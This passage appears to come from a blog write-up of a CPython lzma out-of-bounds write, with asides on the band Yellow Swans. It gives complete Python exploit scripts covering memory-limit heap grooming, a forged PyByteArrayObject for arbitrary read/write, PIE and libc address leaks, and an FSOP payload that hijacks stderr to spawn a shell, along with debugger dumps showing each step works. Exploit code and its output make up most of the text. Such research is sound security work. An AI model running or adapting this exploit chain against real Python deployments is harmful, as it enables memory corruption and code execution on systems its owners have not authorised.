// [33mdata[39m=0x00007fffffff9ea0 → [...] → [33m"AAAAAAAAAAAAAAAA"[39m, [33mlzs[39m=0x00007fffffff9ec0 → [...] → 0xff1422255f124a10
[32m → 1025[39m [32m memcpy((void*)(lzs->next_in + lzs->avail_in), data, len);[39m
1026 lzs->avail_in += len;
1027 input_buffer_in_use = 1;
1028 }
1029 else {
1030 lzs->next_in = data;
We will be writing to 0x7ffff6cda0c0, which is the boundary of the original buffer (since we compute next_in + avail_in), a clear OOB write. If we manage to get some sort of useful struct adjacent to the original buffer, then we’re golden in upgrading this OOB write to an arbitrary R/W!
Note: as I’m writing this post, for some reason this buffer is sitting in the pyheap (0x7ffff7600000 range) rather than the regular glibc heap (0x555555e51000 range). This pisses me off because the fact that a large buffer should be landing in the glibc heap instead is part of why the next few sections are so messy. Regardless, we cringe on.
Going Places
Yellow Swans are an interesting noise/ambient/drone/tape music project. Something I’m a big fan of is all of their alt names (the same way SPK or Feotus has hella alt names), all being some variation on D.* Yellow Swans. Drowner Yellow Swans, Dove Yellow Swans, Doorendoorslechte Yellow Swans… “Going Places” is easily their most popular work, and for good reason. Ethereal yet damning ambient soundscapes that swallow you whole.
Anyways, let’s try to upgrade our primitive.
Finer Memory Control
Right now, our memory exhaustion is being triggered by, well, dumb luck. We have just enough memory that we only have a failed malloc at the specific block we want, and this quickly becomes extremely unreliable once you as much as sneeze on the code. Furthermore, we want to at least try to get our buffer to land in the pyheap rather than the glibc heap so that we have more structs to play with.
We start by shrinking down our LZMA compressed payload to a healthier 2kB. If we’re good, we can make this work. Since we also want adjacent structs, we should try something sort of but not exactly ? but maybe it actually is heap spraying: after shrinking our memory space, we spam objects until we hit our memory limit, then we pop a few which ideally should be adjacent
import resource
import lzma
soft_limit, hard_limit = resource.getrlimit(resource.RLIMIT_AS)
limit = int(32 * 1024 * 1024) # because shaving a megabyte makes all the difference
resource.setrlimit(resource.RLIMIT_AS, (limit, hard_limit))
SIZE = 2*1024
fillers = []
try:
while True:
# sprayyyy
fillers.append(bytearray(SIZE))
except MemoryError:
pass
# these should be side by side?
fillers.pop()
fillers.pop()
c = bytearray(
b'\xfd7zXZ\x00...' # shrunk down to 2kB
)
d = bytearray(len(c))
We’re hitting another snag though. Remember the lzma_code calls in decompress_buf? That allocates a bunch of crap too, so now we keep hitting a premature MemoryError after a few iterations of it before we can even make it to our error block. After a bit of tinkering, however, an obvious solution came to me.
953...
954 if (lzret == LZMA_STREAM_END) {
955 FT_ATOMIC_STORE_CHAR_RELAXED(d->eof, 1);
956 break;
957 } else if (lzs->avail_out == 0) {
958 /* Need to check lzs->avail_out before lzs->avail_in.
959 Maybe lzs's internal state still have a few bytes
960 can be output, grow the output buffer and continue
961 if max_lengh < 0. */
962 if (OutputBuffer_GetDataSize(&buffer, lzs->avail_out) == max_length) {
963 break;
964 }
965 if (OutputBuffer_Grow(&buffer, &lzs->next_out, &lzs->avail_out) < 0) {
966 goto error;
967 }
968...
If lzs->avail_out is set to 0x0, we will exit decompress_buf after just one lzma_code call. For some reason, we can call decompress with a max_length of… zero. So that means we can get decompress_buf to reliably prematurely exit, making our memory conditions easier to hit. Wonderful! Our script now looks something like this:
import resource
import lzma
import os
import ctypes
def heap_addr(b: bytearray) -> int:
buf = (ctypes.c_char * len(b)).from_buffer(b)
return ctypes.addressof(buf)
soft_limit, hard_limit = resource.getrlimit(resource.RLIMIT_AS)
limit = int(32 * 1024 * 1024) # because shaving a megabyte makes all the difference
resource.setrlimit(resource.RLIMIT_AS, (limit, hard_limit))
SIZE = 2*1024
fillers = []
try:
while True:
fillers.append(bytearray(SIZE))
except MemoryError:
pass
fillers.pop()
fillers.pop()
c = bytearray(
b'\xfd7zXZ\x00...' # shrunk down to 2kB
)
d = bytearray(len(c))
print(f'Allocated {len(fillers)} fillers of size {SIZE/1024}kB each')
decompressor = lzma.LZMADecompressor()
try:
print(f"Original data at {hex(id(c))}, {hex(heap_addr(c))}")
print(f"Next thing at {hex(id(d))}, {hex(heap_addr(d))}")
input(f"Decompressor is at {hex(id(decompressor))}")
a = decompressor.decompress(c, 0) # this is to break lzma decompress_buf at lzs->avail_out == 0
except MemoryError:
pass
finally:
resource.setrlimit(resource.RLIMIT_AS, (soft_limit, hard_limit))
input("MemError triggered, decompressing again")
a = decompressor.decompress(b'\x00' + b'\xfd'*16, 1)
I’m cheating a little bit here with the ctypes crap for debugging purposes. This is because by creating bytearrays, I’m creating a PyByteArrayObject that would sit in the pyheap, whereas the actual memory which contains the data (and more importantly, where the OOB write would occur) is instead in the glibc heap and an entry in the struct. So when calling id, you get the object’s address (the actually mutable crap) and the byte data sits elsewhere (somehow, this is relevant later).
Running this script, we now see that we can get structs that are kissing (the gap between the addresses is 2kB):
[1m[32mgef➤ [0mr ../../test4.py
Starting program: [32m~/cpython/build-debug/python[39m ../../test4.py
[Thread debugging using libthread_db enabled]
Using host libthread_db library "[32m/usr/lib/libthread_db.so.1[39m".
Allocated 5310 fillers of size 2.0kB each
Original data at 0x7ffff76ccbe0, 0x555556ab9910
Next thing at 0x7ffff76ccc40, 0x555556aba230
Decompressor is at 0x7ffff77c8f40
...
[1m[32mgef➤ [0mx/20gx 0x555556aba230-0x80
[34m0x555556aba1b0[39m: 0x0008808011910100 0xfb67c4b18c5a88ba
[34m0x555556aba1c0[39m: 0x5a59040000000002 0xfdfdfdfdfdfdfd00
[34m0x555556aba1d0[39m: 0xfdfdfdfdfdfdfdfd 0xddddddddddddddfd
[34m0x555556aba1e0[39m: 0xdddddddddddddddd 0x0000000000000921
[34m0x555556aba1f0[39m: 0xf108000000000000 0xfdfdfdfdfdfdfd72
[34m0x555556aba200[39m: 0xd908000000000000 0xfdfdfdfdfdfdfd6f
[34m0x555556aba210[39m: 0x0000000000000001 0x0000555555d3f060
[34m0x555556aba220[39m: 0x00000000000008b8 0xffffffffffffffff
[34m0x555556aba230[39m: 0x0000000000000000 0x0000000000000000
[34m0x555556aba240[39m: 0x0000000000000000 0x0000000000000000
Ok, two things:
- This OOB write in its current state is not very useful. We are now overflowing into another allocated data carrying region, not the
PyByteArrayObjectthat would actually be relevant. Even if we corrupt the chunk headers, it would probably be really difficult to expand this into something useful, especially with a garbage collector in the way. It’s basically impossible to land our LZMA buffer in the pyheap while also fulfilling the memory exhaustion criteria, so we need to be more creative with our overwrite. - What the fuck is up with the
fdandddbytes? I didn’t put those there.
The Punishment for Using a Debug Build
Remember I said using a debug build is blasphemous? Here’s a quick excerpt from the Python documentation:
When Python is built in debug mode, the PyMem_SetupDebugHooks() function is called at the Python preinitialization to setup debug hooks on
Python memory allocators to detect memory errors.
The PYTHONMALLOC environment variable can be used to install debug hooks on a Python compiled in release mode (ex: PYTHONMALLOC=debug).
The PyMem_SetupDebugHooks() function can be used to set debug hooks after calling PyMem_SetAllocator().
These debug hooks fill dynamically allocated memory blocks with special, recognizable bit patterns.
Newly allocated memory is filled with the byte 0xCD (PYMEM_CLEANBYTE), freed memory is filled with the byte 0xDD (PYMEM_DEADBYTE).
Memory blocks are surrounded by “forbidden bytes” filled with the byte 0xFD (PYMEM_FORBIDDENBYTE).
Strings of these bytes are unlikely to be valid addresses, floats, or ASCII strings.
The purpose of this padding is so that developers can more easily catch these OOB bugs since writing over the forbidden bytes and so on will certainly trigger a crash. This is actually incredibly useful and an amazing feature.
However, this also means that writing my exploit becomes slightly more annoying and whatever I write for this debug build will not work on a release build. Dammit! Let’s shift over to a release build and wrap up our exploit.
Actually Getting Arb R/W
Okay okay so. Let’s think about what a useful struct to overflow into would be. We want some pointers that we can overwrite…
When allocating a large array, the backing array (i.e. the actual region of memory which contains the relevant pointers to the objects in the array) are thrown into the glibc heap, so if we can get that to kiss our bad buffer, then we might be able to make an array element point to a fake PyObject…
import resource
import lzma
import struct
soft_limit, hard_limit = resource.getrlimit(resource.RLIMIT_AS)
limit = int(32 * 1024 * 1024)
resource.setrlimit(resource.RLIMIT_AS, (limit, hard_limit))
SIZE = 2*1024
fillers = []
try:
while True:
fillers.append(bytearray(SIZE))
except MemoryError:
pass
fillers.pop()
fillers.pop()
fillers.pop()
payload = (
b'\xfd7zXZ\x00\x00\x04\xe6\xd6\xb4F\x00\x00\x00\x00\x1c\xdfD!\x1f\xb6\xf3}\x01\x00\x00\x00\x00\x04YZd'
+ b'A'*(2048-32+10)
)
c = bytearray(
payload
)
# we want to overwrite some list pointer
d = [0] * (256+5)
for i in range(256+5):
d[i] = i
print(f'Allocated {len(fillers)} fillers of size {SIZE/1024}kB each')
x = bytearray(2048-10)
e = b'A'*(2048-10) # once again, some fuckery to hit OOM
Notice how it took me this long to realise I could just scam my way with an LZMA header and a bunch of 0x41s since we’re prematurely axing the decompression. Well, this arrangement is just nice to get the backing array of d to be adjacent to the backing memory of c.
[Thread debugging using libthread_db enabled]
Using host libthread_db library "[32m/usr/lib/libthread_db.so.1[39m".
Allocated 6165 fillers of size 2.0kB each
Original data at 0x7ffff75b67f0
Next thing at 0x7ffff779f500
Decompressor is at 0x7ffff773c1f0
...
[1m[38;5;240m────────────────────────────────────────────────────────────────────────────────────────────────────[0m
[1m[32mgef➤ [0mx/8gx 0x7ffff75b67f0 <-- this is the PyByteArrayObject of c
[34m0x7ffff75b67f0[39m: 0x0000000000000001 0x0000555555c35fa0
[34m0x7ffff75b6800[39m: 0x000000000000080b 0x000000000000080b
[34m0x7ffff75b6810[39m: 0x0000555556b023b0 0x0000555556b023b0 <-- this is the backing array address
[34m0x7ffff75b6820[39m: 0x0000000000000000 0x0000555556b02390
[1m[32mgef➤ [0mx/20gx 0x0000555556b023b0
[34m0x555556b023b0[39m: 0x0400005a587a37fd 0x0000000046b4d6e6 <-- our LZMA data is here
[34m0x555556b023c0[39m: 0x7df3b61f2144df1c 0x5a59040000000001
[34m0x555556b023d0[39m: 0x4141414141414164 0x4141414141414141
[34m0x555556b023e0[39m: 0x4141414141414141 0x4141414141414141
[34m0x555556b023f0[39m: 0x4141414141414141 0x4141414141414141
[34m0x555556b02400[39m: 0x4141414141414141 0x4141414141414141
[34m0x555556b02410[39m: 0x4141414141414141 0x4141414141414141
[34m0x555556b02420[39m: 0x4141414141414141 0x4141414141414141
[34m0x555556b02430[39m: 0x4141414141414141 0x4141414141414141
[34m0x555556b02440[39m: 0x4141414141414141 0x4141414141414141
[1m[32mgef➤ [0mx/8gx 0x7ffff779f500 <-- this is the arrayobject of d
[34m0x7ffff779f500[39m: 0x0000000000000001 0x0000555555c47900
[34m0x7ffff779f510[39m: 0x0000000000000105 0x0000555556b02bd0 <-- this is the backing array address
[34m0x7ffff779f520[39m: 0x0000000000000105 0x00000000006e6f6d
[34m0x7ffff779f530[39m: 0x00007ffff779f431 0x00007ffff779f770
[1m[32mgef➤ [0mx/20gx 0x0000555556b02bd0-0x40 <-- peeking a bit behind, we see they kiss <3
[34m0x555556b02b90[39m: 0x4141414141414141 0x4141414141414141
[34m0x555556b02ba0[39m: 0x4141414141414141 0x4141414141414141
[34m0x555556b02bb0[39m: 0x4141414141414141 0x0000000000414141
[34m0x555556b02bc0[39m: 0x0000000000000000 0x0000000000000831
[34m0x555556b02bd0[39m: 0x0000555555c7e860 0x0000555555c7e880
[34m0x555556b02be0[39m: 0x0000555555c7e8a0 0x0000555555c7e8c0
[34m0x555556b02bf0[39m: 0x0000555555c7e8e0 0x0000555555c7e900
[34m0x555556b02c00[39m: 0x0000555555c7e920 0x0000555555c7e940
[34m0x555556b02c10[39m: 0x0000555555c7e960 0x0000555555c7e980
[34m0x555556b02c20[39m: 0x0000555555c7e9a0 0x0000555555c7e9c0
[1m[32mgef➤ [0m
Now, we can overwrite from the end of our fake LZMA buffer into the backing array! We just need to make it point to a fake PyObject struct, and of course the most useful would be… a PyByteArrayObject! If we fake a struct that just starts at, like, 0x0 or something and has an obscene size, we basically get arbitrary R/W across the entire memory space.
Where can we put our fake struct? For some reason, when doing up the exploit for the first time, I thought it would be really smart to put it in the fake LZMA buffer, then using a separate heap leak I’d calculate the offset to it. This was extremely painful, thoughless, and stupidly unreliable (even adding a single addition to the script would completely change the offset!). A quick set of texts with Lucas “samuzora” Tan showed me the error of my ways, thankfully (why even calculate an offset when you can just… use the payload position directly?).
So let’s get the following:
- Our fake struct in the heap that we can get the heap address of, done by making a large
byteobject (not abytearray) - A PIE leak (trivially done by leaking
id(int)and calculating the offset)
Our script now looks like this:
import resource
import lzma
import struct
soft_limit, hard_limit = resource.getrlimit(resource.RLIMIT_AS)
limit = int(32 * 1024 * 1024)
resource.setrlimit(resource.RLIMIT_AS, (limit, hard_limit))
SIZE = 2*1024
fillers = []
try:
while True:
fillers.append(bytearray(SIZE))
except MemoryError:
pass
fillers.pop()
fillers.pop()
fillers.pop()
faker = (
b'd\x00\x00\x00\x00\x00\x00\x00' # ob_refcnt (non-zero)
+ struct.pack("<q", id(bytearray)) # ob_type
+ b'\xff\xff\xff\xff\xff\xff\xff\x7f' # ob_size
+ b'\xff\xff\xff\xff\xff\xff\xff\x7f' # ob_alloc
+ struct.pack("<q", id(int)-0x6f4680) # ob_bytes (buffer pointer, we do PIE base)
+ struct.pack("<q", id(int)-0x6f4680) # ob_start (just keep it the same)
+ b'\x00\x00\x00\x00\x00\x00\x00\x00' # ob_exports
+ b'A'*2048 # padding to fall into glibc heap
)
lzma_buffer = (
b'\xfd7zXZ\x00\x00\x04\xe6\xd6\xb4F\x00\x00\x00\x00\x1c\xdfD!\x1f\xb6\xf3}\x01\x00\x00\x00\x00\x04YZ'
+ b'A'*(2048-32+10)
)
c = bytearray(
lzma_buffer
)
# we want to overwrite some list pointer
d = [0] * (256+5)
for i in range(256+5):
d[i] = i
print(f'Allocated {len(fillers)} fillers of size {SIZE/1024}kB each')
x = bytearray(2048-10)
e = b'A'*(2048-10) # once again, some fuckery to hit OOM
decompressor = lzma.LZMADecompressor()
try:
print(f"Original data at {hex(id(c))}")
print(f"Next thing at {hex(id(d))}")
print(f'Fake struct at {hex(id(faker))}')
input(f"Decompressor is at {hex(id(decompressor))}")
a = decompressor.decompress(c, 0) # this is to break lzma decompress_buf at lzs->avail_out == 0
except MemoryError:
pass
finally:
resource.setrlimit(resource.RLIMIT_AS, (soft_limit, hard_limit))
input("MemError triggered, decompressing again")
# this is our OOB write!
a = decompressor.decompress(
b'\x00'*6 # padding between our kissing objects
+ struct.pack("<q", 0x0)
+ struct.pack("<q", 0x831) # do not fuck the glibc header
+ struct.pack("<q", id(faker)+0x20), # address of our fake struct, +0x20 to account for the header
1)
input(f"OOB Write done!, array will start at {hex(id(int)-0x6f4680)}")
print(d[0][:256])
If you’re wondering what’s up with the x and e arrays and why we’re putting the lzma_buffer in a bytearray before calling decompress on it… uh… I couldn’t tell you. That’s just bad code and bad experimentation. This script can definitely be cleaner. Running this, we see that all of that actually worked!
➜ build-release git:(480edc1aae0) ✗ ./python ../../test4_1.py
Allocated 6172 fillers of size 2.0kB each
Original data at 0x7f797ee6ab30
Next thing at 0x7f797f06b380
Fake struct at 0x55ded7e3d6a0
Decompressor is at 0x7f797eff81f0
MemError triggered, decompressing again
OOB Write done!, array will start at 0x55de9a8b6000
bytearray(b'\x7fELF\x02\x01\x01...')
Wonderful. We now have arbitrary read and write and can do whatever we want. Like a crappy FSOP payload with hardcoded offsets.
# gonna need to make it to GOT with this one
leak = (d[0][0x6e0038:0x6e0038+8])
libc_base = int.from_bytes(leak,'little')-0x89ae0
print('libc base: ', hex(libc_base))
print('stderr: ', hex(libc_base+0x1e84a0))
elf_base = id(int)-0x6f4680
stderr = libc_base+0x1e84a0
wfile_jumps = libc_base+0x1e6228
system = libc_base+0x53b00
p64 = lambda x: struct.pack('<Q', x)
input("pause...")
fsop = b''.join([
b" sh\x00\x00\x00\x00", # 0x00: flags
p64(0), # 0x08: _IO_read_ptr
p64(0), # 0x10: _IO_read_end
p64(0), # 0x18: _IO_read_base
p64(0), # 0x20: _IO_write_base
p64(1), # 0x28: _IO_write_ptr
p64(0) * 7, # 0x30 - 0x60: write_end, buf_base... to markers
p64(system), # 0x68: chain
p64(0) * 3, # 0x70 - 0x80: fileno, old_offset, cur_column
p64(stderr + 0x210), # 0x88: _lock (needs to point to writable nulls)
p64(0), # 0x90: _offset
p64(stderr), # 0x98: _codecvt
p64(stderr - 0x48), # 0xa0: _wide_data
p64(0) * 6, # 0xa8 - 0xd0: freeres, pad, mode, unused
p64(wfile_jumps) # 0xd8: vtable
])
print(d[0][stderr-elf_base:stderr-elf_base+64])
d[0][stderr-elf_base:stderr-elf_base+len(fsop)] = fsop
And we get a shell :)
![]() |
|---|
| Fig: Winner winner chicken dinner |
Conclusion
Was this a difficult bug to exploit? Eh… the hard part was honestly finagling the memory to behave how we want since the OOB write primitive itself is quite obvious to get to. Once you get the OOB write, then it’s just a matter of knowing what to do with it since you’re sitting in the sad glibc heap rather than the cool epic pyheap (I wasted a lot of time trying to figure out how to land the LZMA buffer in the pyheap with the memory exhaustion criteria).
So what did I learn from this?
- The Python debug build padding thing.
- How to throttle Python script resources.
- That’s about it actually the rest of the pwn stuff was not complex nor novel to me.
Hopefully, you at least found this entertaining. Okay, ciao.


